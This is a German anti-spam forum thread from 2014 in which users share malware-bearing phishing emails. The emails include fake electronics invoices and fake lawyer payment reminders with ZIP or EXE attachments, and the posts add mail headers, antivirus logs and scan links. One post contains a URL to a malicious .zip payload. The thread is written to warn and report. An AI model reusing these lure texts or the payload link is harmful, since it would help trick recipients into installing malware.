Ich habe überhaupt nichts von der ACO Electronics Company bestellt aber meine Kreditkarte soll laut Dennis Watson mit 87 GBP belastet werden. :gack: Ich trau mir allerdings nicht die Details zu dieser angeblichen Bestellung aufzurufen, da der Link mit „.zip“ endet und dies könnte unter Umständen negative Auswirkungen auf mein PC haben. :knife:

Return-Path: cevi03ab [at] student.cbs.dk
Received: from mi4-p00-ob.smtp.rzone.de ([81.169.146.144]) by
mx.kundenserver.de (mxeue002) with ESMTPS (Nemesis) id
0LcXlX-1VW7hJ2SkZ-00k81p for <*****@*****.de>; Wed, 12 Feb 2014 03:09:18
+0100
X-RZG-FWD-BY: *********@********.de
Received: from mailin.rzone.de ([unix socket])
by mailin.rzone.de (RZmta 32.26) with LMTPA;
Wed, 12 Feb 2014 03:09:11 +0100 (CET)
X-RZG-MI-VALUES: bm=0 mafl=1 sh=0 du=0 sp=2,1 vv=1 nf=0
X-Strato-MessageType: email
X-RZG-CLASS-ID: mi
Received: from lvps109-104-78-76.vps.webfusion.co.uk ([109.104.78.76])
by smtpin.rzone.de (RZmta 32.26 OK)
with ESMTP id K07fb0q1C296yTG
for <*********@********.de>;
Wed, 12 Feb 2014 03:09:06 +0100 (CET)
Received: from {LINE[from_ip]#fip}21.225 ([{#fip}21.225])
Message-ID: <001d01cf2797$6714e000$4111000a [at] tcbpyemXltRC>
From: "Dennis Watson" <cevi03ab [at] student.cbs.dk>
To: "Consumer" <*********@********.de>
Subject: Order processing
Date: Wed, 12 Feb 2014 02:09:06 +0000
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
{LINE[charset]}
reply-type=original
Content-Transfer-Encoding: 7bit
Envelope-To: <*****@*****.de>




Dear Consumer
This is a notification that the bill of parcels has been produced on 02/05/2014. Your payment method is: credit card. The order reference is 373987.
Your credit card will be charged for 87 GBP.
The specification are below:
http://www.ciaoitalyvillas.com/02-2014/bill/bl-901-036.zip
Yours faithfully,
ACO Electronics Company
Dennis Watson

Gruß von SpamKampf

cano89
22.02.2014, 09:05
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 212.227.17.10) smtp.mailfrom=xx [at] online.de; dkim=none header.d=online.de; x-hmca=none header.id=xxxxxx [at] online.de
X-SID-PRA: xxxxxx [at] online.de
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0x
X-Message-Info: NhFq/7gR1vQgiyfVu7hHjTzdJcUSkD64ICYdUsPQaG88ALdzWefSUy1PjMH3KEgHoxUhyZnaidG05tmuzLbzI T8VYIOdFNUrRriDuZnYvTu1TRzxdKZawDnAuSRABLCyel/eSGxII6ApJKscyCTMx/bUH+WWGNWIB+49R8AYBK944MQSyn7I46+lmH3+Mz2QA2L8q9OqZkxaNImTfQ0q8TABnkaq7yXo
Received: from moutng.kundenserver.de ([212.227.17.10]) by COL0-MC4-F19.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Fri, 21 Feb 2014 05:39:26 -0800
Received: from Futura-PC (p5DC1377F.dip0.t-ipconnect.de [93.193.55.127])
by mrelayeu.kundenserver.de (node=mreue104) with ESMTP (Nemesis)
id 0MhU26-1WcChA1cqg-00Mbxh; Fri, 21 Feb 2014 14:39:25 +0100
From: "Rechnungsstelle" <xxxxxx [at] online.de>
Subject: Ausgleich der stornierten Buchung Ihrer Bestellung
Date: Fri, 21 Feb 2014 13:39:10 GMT
Message-ID: 48723.2914.ElMA-neNb [at] online.de
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC87410036"
X-Provags-ID: V02:K0:Dbo9C1ydvZz7i1vQsxJHVtudYQMPED2MBl0nXWj6WLh
+DBUgyyol7uOAaT1COV8srHNtJCKvUTsumOU1Qs+PS5ic+rdCs
iyczZ6+0dOLBmejW7V9bv4y62uzOkJjN0fcVNp0pbqezQgJnsZ
e4eHDtwKvv5MRoqX5mw4Rp+XM2KZ09zy9gr5OHNvzv5agWowe7
0uyU1iLNaHb4LGcAIi/O95ADCx4xWttaykDw6Xa412+1dHdYc+
TCDtb5qqKQFqXEWBk9jYFTXzUnBsWFZ+UVy8FMBNyhJtXrjZKe
CMS8DkOcuaV6DruC/7AeZcihyK1SVBRQp0sMzBZQZbcnOARJ4N
DI4+p8vNeEnslsZMyie4=
Return-Path: xxxxxx [at] online.de
X-OriginalArrivalTime: 21 Feb 2014 13:39:26.0874 (UTC) FILETIME=[56C197A0:01CF2F0A]

--=-XC87410036
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline



Guten Tag Vorname / Nachname

leider konnten wir bis zum heutigen Tage keinen Zahlungseingang auf unsere Rechnung vom 04.01.2014 feststellen. Rechnung Nummer: AP--795373548. Bestimmt handelt es sich dabei um ein Versehen Ihrerseits die Rückbuchung von Ihrem Konto zu berücksichtigen.

Bitte überweisen Sie den ausstehenden Betrag ohne Abzüge bis zum 24.02.2014 auf unser Bankkonto. Die Gesamtsumme der Bestellung ist 314,00 Euro.
Dabei wird Ihnen eine Mahngebühr von 14,00 Euro und die Kosten unserer Beauftragung von 43,73 Euro berechnet. Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen.

Mit freundlichen Grüßen.

J.P.


edit// scheinbar ist das "Whois" Dingens kaputt :indecisiveness:

MOD: nein, die whois Funktion ist ok und nur für URL zu benutzen, Header bitte mit taggen

madman70
24.02.2014, 16:02
Und wieder mysteriöse Online-Anwälte:



Guten Tag xxxxx,

leider konnten wir bis zum heutigen Tage keinen Zahlungseingang auf unsere Rechnung vom 05.01.2014 feststellen. Paketnummer: OO/4514257865. Bestimmt ist es Ihnen nur entgangen die Rückbuchung von Ihrem Konto zu berücksichtigen.

Bitte überweisen Sie den ausstehenden Betrag zuzüglich der Zusatzgebühren bis zum 27.02.2014 auf unser Bankkonto. Der Rechnungsbetrag der Bestellung ist 142,00 Euro.
Zusätzlich wird Ihnen eine Mahngebühr von 17,00 Euro und die Kosten unserer Beauftragung von 35,95 Euro verrechnet. Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen.

Mit freundlichen Grüßen.

Online Anwaltschaft Tom Berger


Da dran hängt dann ein ZIP - sicher mit einem knuffigen Trojaner drin...

Hier wär noch der Header:


Return-Path: die.mooshofer [at] gmx.de
Received: from mout-xforward.gmx.net ([82.165.159.12]) by mx-ha.web.de
(mxweb102) with ESMTPS (Nemesis) id 0M4FRP-1X7yvm2DEx-00rpJF for
<xxxxx [at] web.de>; Mon, 24 Feb 2014 15:25:41 +0100
Received: from hansi-d6a692af4 ([77.21.100.86]) by mail.gmx.com (mrgmx002)
with ESMTPSA (Nemesis) id 0MNq4h-1WJJ7r01jn-007Sc0 for <xxxxx [at] web.de>;
Mon, 24 Feb 2014 15:25:40 +0100
From: "Beauftragte Anwaltschaft" <die.mooshofer [at] gmx.de>
To: "xxxxx" <xxxxx [at] web.de>
Subject: =?utf-8?q?xxxxx Ihre Lastschrift konnte nicht durchgef=C3=BChrt werden?=
Date: Mon, 24 Feb 2014 14:25:30 GMT
Message-ID: 10499.56407.wZBG-VhBZ [at] gmx.de
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC797256B0"
X-Provags-ID: V03:K0:+ClFhAmG2QtFrTVrrnuRfr8OK1sZa7qOYvY1BZUlyoP+QUODgl4
pwuULpDrwYoXabN9zLOdvIC+Z1OKnKsruq8ULOq7n2Y6wXYpWvkBp4UNlEvxxVpbw53rete
yDXeYgOeLH9GZkecmcK+yi6hHtjJtu8pcVMhO6f/5b1FRbi/tU/EsQI+aapbdbAY63h/4oW
iKsRwb8dBm6rQIw1waDwQ==
Envelope-To: <xxxxx [at] web.de>

Frechdachs
26.02.2014, 10:53
Moin moin zusammen,

und wieder ein netter Versuch, Schadsoftware unterzujubeln.



Sehr geehrter Kunde,

leider konnten wir bis zum heutigen Tage keinen Zahlungseingang auf unsere Rechnung vom 02.01.2014 feststellen. Rechnungsnummer: KW--236845253. Bestimmt handelt es sich nur um ein Versehen in der Hektik des Alltags.

Bitte begleichen Sie den ausstehenden Betrag zuzüglich der Gebühren bis zum 04.03.2014 auf unser Bankkonto. Die Summe der Bestellung entspricht 273,00 Euro.
Dabei wird Ihnen eine Mahngebühr von 13,00 Euro und die Kosten unserer Beauftragung von 46,93 Euro verrechnet. Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen.

Mit freundlichen Grüßen.

Online Anwaltschaft Jan Baumann


---
avast! Antivirus: Eingehende Nachricht ist INFIZIERT:
25.02.2014 Forderung der abgewiesenen automatischen Kontoabbuchung.zip#551434721|>Anwalt stornierte Kontolastschrift 25.02.2014.zip|>Beauftragte Anwaltschaft stornierte Kontolastschrift.com (Win32:Malware-gen) wurde aus der Nachricht gelöscht.

Virus-Datenbank (VPS): 140225-1, 25.02.2014
Getestet um: 26.02.2014 10:13:25
avast! - Copyright (c) 1988-2014 AVAST Software.
http://www.avast.comReturn-path: <mompix.65 [at] t-online.de>
Delivery-date: Wed, 26 Feb 2014 10:04:35 +0100
Received: from [195.4.92.11] (helo=mx1.freenet.de)
by mbox11.freenet.de with esmtpa (ID exim) (Exim 4.80.1 #3)
id 1WIaPq-0002dB-43
for xxxxxxxxxxxxxx [at] 01019freenet.de; Wed, 26 Feb 2014 10:04:35 +0100
Received: from mailout05.t-online.de ([194.25.134.82]:51709)
by mx1.freenet.de with esmtps (TLSv1:AES256-SHA:256) (port 25) (Exim 4.80.1 #4)
id 1WIaPp-0001Vn-PR
for xxxxxxxxxxxxxx [at] freenet.de; Wed, 26 Feb 2014 10:04:34 +0100
Received: from fwd11.aul.t-online.de (fwd11.aul.t-online.de )
by mailout05.t-online.de with smtp
id 1WIaPo-000449-N7; Wed, 26 Feb 2014 10:04:32 +0100
Received: from REINHECKEL_PC (rX1V6aZ1YhJFQFBD8uCVVQo-Tw19mG5zdl9zrhfk3BIkc8-wXCHAqe7fWy4sYYUgJx@[84.163.17.127]) by fwd11.t-online.de
with esmtp id 1WIaPh-2HkzB20; Wed, 26 Feb 2014 10:04:25 +0100
From: "Anwalt" <mompix.65 [at] t-online.de>
To: "xxxxxxxxxxxxxx" <xxxxxxxxxxxxxx [at] freenet.de>
Subject: *** VIRUS ***=?utf-8?q?Die Lastschrift konnte von Ihrem Bankkonto nicht durchgef=C3=BChrt werden?=
Date: Wed, 26 Feb 2014 09:02:57 GMT
Message-ID: 15132.54523.PJLT-XJbB [at] t-online.de
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC75B6966B"
X-ID: rX1V6aZ1YhJFQFBD8uCVVQo-Tw19mG5zdl9zrhfk3BIkc8-wXCHAqe7fWy4sYYUgJx
X-TOI-MSGID: b1efaf1b-dc2d-488e-a2a1-dd7f90d224c3
X-purgate-ID: 149285::1393405473-00000A1C-AE0B09C0/0-0/0-0
Delivered-To: xxxxxxxxxxxxxx [at] 01019freenet.de
Delivered-To: xxxxxxxxxxxxxx [at] freenet.de
Envelope-to: xxxxxxxxxxxxxx [at] freenet.de
X-Originated-At: 194.25.134.82!51709
Delivered-To: xxxxxxxxxxxxxx [at] 01019freenet.de
X-Antivirus: avast! (VPS 140225-1, 25.02.2014), Inbound message
X-Antivirus-Status: Infected
X-Attachment: 25.02.2014 Forderung der abgewiesenen automatischen Kontoabbuchung.zip#551434721|>Anwalt stornierte Kontolastschrift 25.02.2014.zip|>Beauftragte Anwaltschaft stornierte Kontolastschrift.com Virus: Win32:Malware-gen Deleted

--=-XC75B6966B
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Gruß Frechdachs

isenaecher
03.04.2014, 21:27
Hallo,

heute hier aufgeschlagen

Return-Path: gerlinde.keller [at] online.de
Received: from moutng.kundenserver.de ([212.227.126.130]) by mx-ha.gmx.net
(mxgmx006) with ESMTPS (Nemesis) id 0MfiXE-1WhocE431g-00NE6A for
<mein_avatar [at] gmx.de>; Thu, 03 Apr 2014 12:36:54 +0200
Received: from Home-PC (pD9E787DA.dip0.t-ipconnect.de [217.231.135.218])
by mrelayeu.kundenserver.de (node=mreue004) with ESMTP (Nemesis)
id 0LwVGF-1X6NsJ0p95-018K9X; Thu, 03 Apr 2014 12:36:54 +0200
From: "Online Mahnung" <gerlinde.keller [at] online.de>
To: "ich selbst" <ich_selbst [at] gmx.de>


Bemerkenswert kurzer Header

212.227.126.130 Server in den Niederlanden. Die gerlinde unter dieser E-Mail-Adresse gibt's sowieso nicht. Die ist erfunden.


Sehr geehrter Kunde Isenächer,

leider konnten wir bis zum heutigen Tage keinen Zahlungseingang auf unsere =
Mahnung Nr. 79JLO9499548469 vom 02.03.2014 erkennen.=20

Ihr Konto wurde nicht gen=C3=BCgend gedeckt um die Kontoabbuchung vorzunehm=
en.=20

Sicherlich handelt es sich dabei nur um ein Versehen.

Bitte begleichen Sie den f=C3=A4lligen Betrag inklusive der Geb=C3=BChren b=
is zum 07.04.2014 auf unser Bankkonto. Der Rechnungsbetrag der Bestellung e=
ntspricht 175,00 Euro.=20
Zuz=C3=BCglich wird Ihnen eine Mahngeb=C3=BChr von 18,00 Euro und die Koste=
n unserer Beauftragung von 29,45 Euro berechnet. Falls Sie diesen Zahlungst=
ermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens u=
nd Verzugszinsen in Rechnung stellen m=C3=BCssen. Die Rufnummer und weitere=
Informationen finden Sie in Ihrer Rechnung anbei im Anhang.=20

Mit freundlichen Gr=C3=BC=C3=9Fen.

Leo Myer

Reingekommen über GMX. Sind die nicht ganz dicht? In der Anrede war mein voller Vor- und Nachnahme.

Die angehängte ZIP habe ich natürlich nicht aufgemacht. Leider hat es mein Spamfilter nicht abgefangen:sleeping:

Gruß

Isenächer

Mittwoch
05.04.2014, 08:53
Return-Path: mfriedrich [at] fastmail.fm
Received: from fastmail.fm ([94.53.228.181]) by mx-ha.web.de (mxweb103) with
ESMTP (Nemesis) id 0MJRuJ-1WTA0c29CF-0036sD for <***@web.de>; Fri, 04
Apr 2014 23:52:00 +0200
Message-ID: <7445B88B.9142C284 [at] fastmail.fm>
Date: Fri, 04 Apr 2014 13:40:10 -0800
Reply-To: "Michael Friedrich" <mfriedrich [at] fastmail.fm>
From: "Michael Friedrich" <mfriedrich [at] fastmail.fm>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070728 Thunderbird/2.0.0.6
X-Accept-Language: en-us
MIME-Version: 1.0
To: "Michael Friedrich" <***@web.de>
Subject: Rechnung


Guten Tag,

Im Anhang dieser Email senden wir Ihnen Ihre aktuelle Rechnung fuer den
Monat April.

Der offene Betrag ist innerhalb von 10 Tagen auf unserem Konto zu
ueberweisen.




MFG
Apay AG
Angehängt ist eine "Rechnung-April.exe", die, wie zu erwarten, virusverseucht ist. Hier der Link zum Analyseergebnis bei Virustotal (https://www.virustotal.com/de/file/a4126da8eb73c2563ce189c0a7c696f793c3a854dcdcfb6bffca35008c010562/analysis/1396680525/), wo derzeit (05.04.2014 08:50 MESZ) 26 von 51 Scannern anschlagen.

Putzig finde ich die Empfängerangabe:


Von: Michael Friedrich <mfriedrich [at] fastmail.fm>
An: Michael Friedrich <r*.b*@web.de> [Nicht meine Web.de-Adresse, ich stand vermutlich im BCC]

Schönen Gruß
Mittwoch

schara56
15.04.2014, 07:38
Eine Rechnung.exe hat mich erreicht - gespamt über Bulgarien:
Received: from fastmail.fm ([46.238.23.158]) by mx-ha.gmx.net (mxgmx107) with
ESMTP (Nemesis) id 0M5qSr-1WtwBb2Iht-00xtOU for <x>;
Tue, 15 Apr 2014 00:04:53 +0200
Message-ID: <14E54ACA.E4DE6D79 [at] fastmail.fm>
Hier der Scan von Jotti.org (http://virusscan.jotti.org/de/scanresult/78b8c19f954a49504d343ac5e9a5d25be1df5c83/2f5b86d3aa68b6576593939c3ef5203551f85c98).

schara56
15.04.2014, 09:47
Here we go again
Received: from fastmail.fm ([87.193.144.18]) by mx-ha.gmx.net (mxgmx103) with
ESMTP (Nemesis) id 0MOU6z-1WdWED1QJR-005nik for <martinszarafinski [at] gmx.de>;
Tue, 15 Apr 2014 08:59:22 +0200
Ergebnis von Jotti (http://virusscan.jotti.org/de/scanresult/78b8c19f954a49504d343ac5e9a5d25be1df5c83/ccbffe428b7c74cb6bf18f64841bede42cdfe9a6)

DJANGO
15.04.2014, 09:49
Heute erstmals auf der gmx-Addy meiner Frau aufgeschlagen: Mail eines "Manuel Wagner" mit Text: "Anbei Ihre Rechnung mit der Bitte um umgehende Begleichung". Im Anhang befindet sich eine .exe-Datei, die wohl verseucht ist. :mad:

schara56
15.04.2014, 09:58
Kann man eigentlich hier antackern (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung&p=371509&viewfull=1#post371509).

[x] done (truelife)

DJANGO
15.04.2014, 10:23
Kann man eigentlich hier antackern (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung&p=371509&viewfull=1#post371509).

[x] done (truelife)

Danke! Sind tatsächlich dieselben Gauner! (http://www.giga.de/extra/malware/news/rechnung-von-apay-ag-und-michael-friedrich-per-mail-was-tun/)

Warum kommt der Dreck immer nur über gmx? Unsere anderen Addys (bei outlook und t-online) blieben bislang gänzlich verschont!

Wuschel_MUC
15.04.2014, 10:50
Warum kommt der Dreck immer nur über gmx? Unsere anderen Addys (bei outlook und t-online) blieben bislang gänzlich verschont!
1. Versuch: Google nach deiner gmx-Adresse. Wird die Suchmaschine fündig, ist der Fall klar: es war ein Harvester.

2. Versuch: Bei GMX war ein Datendieb.

Am einfachsten wäre es, die E-Mail-Adresse zu löschen...

Wuschel

Erftwalk
15.04.2014, 11:06
Bei mir kommt auch Dreck über T-Online, allerdings längst nicht so viel wie bei GMX. Der Krankenversicherungsmist kommt bei mir über T-Online.

DJANGO
15.04.2014, 11:48
Inzwischen wurden meine beiden gmx-Addys auch von "Manuel Wagner" bedient.

Katzina
15.04.2014, 12:21
"[Virus] Neue Bestellung /...." und "Krankenversicherungsspam" kommem bei mir über "web.de" an, "gmx.de" blieb davon noch verschont.

Investi
19.04.2014, 14:06
Inzwischen wurden meine beiden gmx-Addys auch von "Manuel Wagner" bedient.

Bei mir kommt es von Lena Wagner. Scheint ein Familienbvetrieb zu sein :-))

Aber auch für PKV und anderen Mist.